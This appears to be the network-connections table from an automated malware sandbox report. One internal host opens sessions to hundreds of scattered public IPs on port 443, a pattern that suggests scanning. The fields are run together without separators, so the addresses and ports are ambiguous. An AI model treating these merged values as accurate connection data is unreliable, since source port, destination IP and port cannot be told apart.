                                              19746192.168.2.1436662154.127.96.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19747192.168.2.1435818197.53.48.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19748192.168.2.1452614179.156.117.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19749192.168.2.1445048150.206.211.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19750192.168.2.1443194200.237.153.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19751192.168.2.145743291.253.70.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19752192.168.2.1451332205.184.73.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19753192.168.2.1454182168.121.137.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19754192.168.2.145682436.67.2.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19755192.168.2.1435706129.24.243.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19756192.168.2.1443458117.109.12.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19757192.168.2.1458652172.225.81.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19758192.168.2.1456576150.170.116.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19759192.168.2.1454032116.108.238.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19760192.168.2.1460128216.146.128.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19761192.168.2.144740640.199.83.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19762192.168.2.1459076203.119.171.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19763192.168.2.143571858.104.221.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19764192.168.2.1457934209.192.134.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19765192.168.2.144955438.99.156.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19766192.168.2.1460384102.79.134.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19767192.168.2.1445874155.41.145.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19768192.168.2.1446566218.92.61.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19769192.168.2.1435388106.223.176.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19770192.168.2.1434348162.46.71.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19771192.168.2.14393168.222.181.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19772192.168.2.144927642.43.151.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19773192.168.2.1443702140.84.106.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19774192.168.2.1447918187.76.247.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19775192.168.2.145663817.171.66.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19776192.168.2.1448464218.194.77.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19777192.168.2.143559235.96.222.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19778192.168.2.1457640220.69.222.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19779192.168.2.143862425.165.93.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19780192.168.2.1447306158.252.123.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19781192.168.2.14576305.223.226.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19782192.168.2.143398857.158.12.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19783192.168.2.145589692.167.158.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19784192.168.2.143674439.110.97.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19785192.168.2.145187076.229.32.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19786192.168.2.146032460.239.130.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19787192.168.2.1442446189.25.225.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19788192.168.2.1452362186.33.250.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19789192.168.2.145273668.217.198.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19790192.168.2.144529688.45.128.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19791192.168.2.144061617.60.172.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19792192.168.2.143576049.151.34.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19793192.168.2.145143693.48.105.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19794192.168.2.1442842124.134.164.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19795192.168.2.1446614170.144.248.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19796192.168.2.1454716148.122.121.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19797192.168.2.145311027.138.99.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19798192.168.2.144553469.249.178.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19799192.168.2.143922267.66.30.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19800192.168.2.145869665.142.141.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19801192.168.2.1452362101.247.124.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19802192.168.2.144098262.83.52.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19803192.168.2.1436998206.1.223.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19804192.168.2.145863678.201.35.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19805192.168.2.1437512140.80.163.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19806192.168.2.1442272150.162.6.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19807192.168.2.143480625.127.117.16443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19808192.168.2.1447004136.228.186.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19809192.168.2.144609420.58.113.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19810192.168.2.1439610108.72.63.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19811192.168.2.1438096198.44.56.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19812192.168.2.144137025.125.60.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19813192.168.2.145786695.231.57.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19814192.168.2.1460480113.166.218.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19815192.168.2.14393682.97.239.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19816192.168.2.1435228103.69.126.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19817192.168.2.1451976139.200.97.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19818192.168.2.1453442157.23.116.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19819192.168.2.144472490.110.123.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19820192.168.2.144308636.216.191.207443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19821192.168.2.1449242107.239.222.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19822192.168.2.1440148145.134.252.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19823192.168.2.145444641.101.96.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19824192.168.2.1457376141.73.205.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19825192.168.2.1439644183.245.162.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19826192.168.2.1453564183.238.138.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19827192.168.2.143391070.247.234.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19828192.168.2.1456772116.112.10.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19829192.168.2.145125899.176.121.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19830192.168.2.1443900177.213.201.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19831192.168.2.1437500198.100.102.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19832192.168.2.1455258210.143.54.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19833192.168.2.1446418106.69.33.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19834192.168.2.144558061.43.41.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19835192.168.2.1455858140.59.199.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19836192.168.2.1447722180.105.5.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19837192.168.2.1436478209.192.253.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19838192.168.2.144943037.88.62.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19839192.168.2.145266675.69.31.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19840192.168.2.1457294176.48.124.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19841192.168.2.1449972213.99.173.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19842192.168.2.1454514126.226.16.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19843192.168.2.144463243.150.173.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19844192.168.2.1435196149.97.127.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19845192.168.2.1437768206.65.60.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19846192.168.2.1438478168.228.122.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19847192.168.2.1439626159.198.61.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19848192.168.2.1438910167.61.180.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19849192.168.2.145492038.83.133.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19850192.168.2.1442260162.198.62.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19851192.168.2.144501845.2.217.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19852192.168.2.1458950150.41.66.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19853192.168.2.1444328147.246.133.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19854192.168.2.144882853.88.87.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19855192.168.2.145538060.149.73.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19856192.168.2.143816291.108.29.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19857192.168.2.1453824131.167.28.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19858192.168.2.143313673.40.129.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19859192.168.2.1435520159.96.190.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19860192.168.2.1436158115.80.183.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19861192.168.2.144343059.48.31.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19862192.168.2.14561601.55.109.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19863192.168.2.1454612179.164.143.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19864192.168.2.1437216157.23.163.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19865192.168.2.1435682177.116.71.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19866192.168.2.145901873.220.210.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19867192.168.2.1446938175.52.112.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19868192.168.2.14341562.21.73.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19869192.168.2.1450766151.111.210.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19870192.168.2.143558841.22.87.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19871192.168.2.1451680205.65.138.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19872192.168.2.144654283.55.180.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19873192.168.2.143568886.88.67.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19874192.168.2.144162866.15.233.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19875192.168.2.145388218.113.11.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19876192.168.2.1459958165.223.10.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19877192.168.2.1454680131.134.9.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19878192.168.2.1441572137.45.115.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19879192.168.2.143297864.79.153.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19880192.168.2.144917451.39.79.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19881192.168.2.1439208211.157.24.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19882192.168.2.1448300146.152.65.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19883192.168.2.1433584200.212.85.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19884192.168.2.1448456165.232.184.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19885192.168.2.1446634208.231.88.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19886192.168.2.1445500105.244.143.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19887192.168.2.1453694218.7.226.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19888192.168.2.145181694.130.251.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19889192.168.2.1447574212.102.133.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19890192.168.2.1456804124.219.141.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19891192.168.2.144139095.5.188.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19892192.168.2.14335968.166.57.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19893192.168.2.1439338182.179.39.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19894192.168.2.1456636138.176.237.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19895192.168.2.143618667.90.203.22443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19896192.168.2.145412466.67.228.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19897192.168.2.145525291.171.227.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19898192.168.2.1455982142.13.75.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19899192.168.2.1442874102.58.99.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19900192.168.2.1448918195.252.94.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19901192.168.2.1449190114.97.250.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19902192.168.2.1434704145.244.103.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19903192.168.2.144651664.199.75.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19904192.168.2.144580614.193.93.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19905192.168.2.1446626212.69.72.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19906192.168.2.1447558137.136.153.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19907192.168.2.1434450154.159.50.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19908192.168.2.1436228169.80.1.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19909192.168.2.145655214.68.46.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19910192.168.2.1457768120.44.181.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19911192.168.2.1440528177.75.203.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19912192.168.2.1448618188.32.210.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19913192.168.2.1445330169.121.182.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19914192.168.2.145567288.139.124.110443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19915192.168.2.1455716116.23.95.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19916192.168.2.143548619.98.196.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19917192.168.2.145692694.7.170.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19918192.168.2.1437048198.220.236.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19919192.168.2.145991059.5.148.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19920192.168.2.1440942110.116.19.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19921192.168.2.144411444.71.128.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19922192.168.2.1435960153.209.97.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19923192.168.2.1442598133.244.17.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19924192.168.2.144990073.61.125.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19925192.168.2.1439772126.18.109.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19926192.168.2.143603025.165.118.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19927192.168.2.1437082162.108.82.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19928192.168.2.1434926139.227.232.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19929192.168.2.1450392176.50.86.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19930192.168.2.1438888164.240.65.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19931192.168.2.143720623.248.18.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19932192.168.2.1454172160.190.87.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19933192.168.2.1457272131.204.71.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19934192.168.2.1460066175.26.50.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19935192.168.2.1459728112.210.82.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19936192.168.2.145431693.139.21.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19937192.168.2.1441506146.231.50.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19938192.168.2.1442738168.189.224.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19939192.168.2.1442624125.221.251.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19940192.168.2.1447118169.239.135.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19941192.168.2.145760090.65.136.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19942192.168.2.144508223.181.20.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19943192.168.2.144051235.174.73.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19944192.168.2.145179892.220.127.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19945192.168.2.1454478128.28.159.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19946192.168.2.143530643.65.83.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19947192.168.2.144542664.2.112.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19948192.168.2.1457552106.51.185.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19949192.168.2.1450592143.10.106.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19950192.168.2.144102052.111.161.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19951192.168.2.143869458.145.234.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19952192.168.2.1449834204.213.168.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19953192.168.2.1445076200.196.165.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19954192.168.2.145515088.136.119.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19955192.168.2.1436358133.251.48.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19956192.168.2.144374483.109.92.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19957192.168.2.1444042169.181.99.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19958192.168.2.144118460.197.42.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19959192.168.2.1451406150.158.11.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19960192.168.2.144047231.83.86.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19961192.168.2.145881485.56.20.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19962192.168.2.143957623.42.138.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19963192.168.2.1446546223.68.197.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19964192.168.2.1451254191.134.6.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19965192.168.2.144014035.101.51.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19966192.168.2.145570444.109.176.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              19967192.168.2.1437914199.216.142.150443
                                              TimestampBytes transferredDirectionData


